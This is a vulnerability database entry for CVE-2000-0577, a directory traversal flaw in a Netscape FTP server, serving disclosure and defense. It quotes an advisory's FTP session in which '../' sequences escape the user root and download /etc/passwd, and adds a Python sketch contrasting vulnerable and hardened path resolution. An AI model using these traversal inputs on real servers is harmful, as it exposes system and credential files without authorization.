Netscape Professional Services FTP Server Vulnerability

Vulnerability ID: 1105892
Vulnerability type: Access validation error
Published: 2000-06-21
Updated: 2005-07-27
CVE ID: CVE-2000-0577
CNNVD-ID: CNNVD-200006-079
Platform: Unix
CVSS score: 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/20046
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-079
|Vulnerability details
A vulnerability exists in Netscape Professional Services FTP Server version 1.3.6. A remote attacker can read arbitrary files via a .. (dot dot) attack.
|Exploit
source: http://www.securityfocus.com/bid/1411/info

Certain versions of the LDAP-aware Netscape Professional Services FTP Server (distributed with Enterprise Web Server) have a serious vulnerability which may lead to a remote or local root compromise. The vulnerability in essence is a failure of the FTP server to enforce a restricted user environment (chroot). By failing to do this, an FTP (anonymous or otherwise) user may download any file on the system (/etc/passwd etc.) as well as upload files at will at the privilege level of the FTP daemon.

Furthermore (quoted from the original attached message) this FTP server supports LDAP users; different LDAP accounts are served on single physical UID. This means, any user can access and eventually overwrite files on other accounts; as it's used in cooperation with webserver, typically virtual web servers are affected. 

$ ftp ftp.XXXX.xxx
Connected to ftp.XXXX.xxx.
220-FTP Server - Version 1.36 - (c) 1999 Netscape Professional Services
220 You will be logged off after 1200 seconds of inactivity.
Name (ftp.XXXX.xxx:lcamtuf): anonymous
331 Anonymous user OK, send e-mail address as password.
Password:
230 Logged in OK
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/n/o/n/anonymous/dupa" because No such
file or directory

[Well... this won't work... uh, lovely physical path, btw ;]

ftp> cd /../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/n/dupa" because No such file or
directory
ftp> cd /../../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/dupa" because
No such file or directory

[Erm? Good God!]

ftp> cd /../../../../../../../../etc/dupa
550 Can't change directory to "/etc/dupa" because No such file or
directory
ftp> cd /../../../../../../../../etc/
250 CWD command successful.
ftp> get /../../../../../../../../etc/passwd KUKU
local: KUKU remote: /../../../../../../../../etc/passwd
200 PORT successfull, connected to A.B.C.D port 62437
150-Type of object is "unknown/unknown". Transfer MODE is BINARY.
150 Opening data connection
226 File downloaded successfully (602 bytes, 602 bytes xmitted)
602 bytes received in 1.71 secs (0.34 Kbytes/sec)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 1 kbytes.
221 CPU time spent on you: 0.100 seconds.

$ cat KUKU
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
...
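
The 550 replies in the session above show each `..` in an absolute argument removing one component of the physical home directory, while a relative argument is clamped. The following Python sketch is an added example, not code from the Netscape server or from the original advisory: `vulnerable_resolve` is a hypothetical model that reproduces those paths, and `safe_resolve` normalizes inside the virtual namespace before mapping to disk and then checks containment. All function names and the `HOME` constant are assumptions.

```python
import posixpath

# Constructed stand-in for the per-user directory seen in the 550 replies.
HOME = "/www1/customer/www.XXXX.xxx/a/n/o/n/anonymous"


def virtual_normalize(cwd, arg):
    """Resolve arg against the virtual cwd; '..' never climbs above virtual '/'."""
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if parts:
                parts.pop()  # at the virtual root there is nothing to pop
        else:
            parts.append(comp)
    return "/" + "/".join(parts)


def vulnerable_resolve(home, cwd, arg):
    """Hypothetical model of the flaw: an absolute argument is appended to the
    home directory and only then normalized, so '..' eats physical components."""
    if arg.startswith("/"):
        return posixpath.normpath(home + arg)
    return posixpath.normpath(home + virtual_normalize(cwd, arg))


def safe_resolve(home, cwd, arg):
    """Normalize in the virtual namespace first, map to disk, then confirm the
    symlink-resolved result is still inside home."""
    physical = posixpath.normpath(home + virtual_normalize(cwd, arg))
    real_home = posixpath.realpath(home)
    real = posixpath.realpath(physical)
    if real != real_home and not real.startswith(real_home + "/"):
        raise PermissionError(f"{arg!r} resolves outside the user root")
    return physical


if __name__ == "__main__":
    for arg in ("../../../dupa", "/../../../dupa",
                "/../../../../../../../../etc/passwd"):
        print(f"{arg}\n  vulnerable: {vulnerable_resolve(HOME, '/', arg)}"
              f"\n  hardened:   {safe_resolve(HOME, '/', arg)}")
```

The final `realpath` comparison is defense in depth: lexical normalization alone does not stop a symlink inside the user root from pointing elsewhere on disk.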
|References

Source: BUGTRAQ
Name: 20000621 Netscape FTP Server - “Professional” as hell :>
Link: http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
Source: BID
Name: 1411
Link: http://www.securityfocus.com/bid/1411
Source: BUGTRAQ
Name: 20000629 (forw) Re: Netscape ftp Server (fwd)
Link: http://archives.neohapsis.com/archives/bugtraq/2000-06/0345.html
